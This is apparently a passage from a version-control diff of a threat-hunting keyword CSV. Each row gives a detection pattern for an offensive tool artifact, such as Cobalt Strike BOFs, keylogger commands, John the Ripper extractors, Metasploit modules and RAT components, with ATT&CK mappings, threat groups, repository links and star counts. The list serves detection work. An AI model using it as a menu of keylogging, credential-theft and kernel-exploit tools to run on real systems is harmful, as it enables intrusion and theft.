T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernelcallbacktable.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7475","2853","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" "*KernelMii.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*Kevin-Robertson/Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*keylog_dump*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_dump*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*keylog_inject.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*keylog_off*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_on*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*keylog_start*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_stop*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylogger dump*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" @@ -12740,17 +12896,17 @@ "*keylogger stopped*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Keylogger*","offensive_tool_keyword","keylogger keyword","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Keylogger.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*keylogger.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" -"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*keylooger.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*keyscan dump*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan start*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan stop*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*KeyTabExtract*","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","145","36","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" "*keyword_obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - 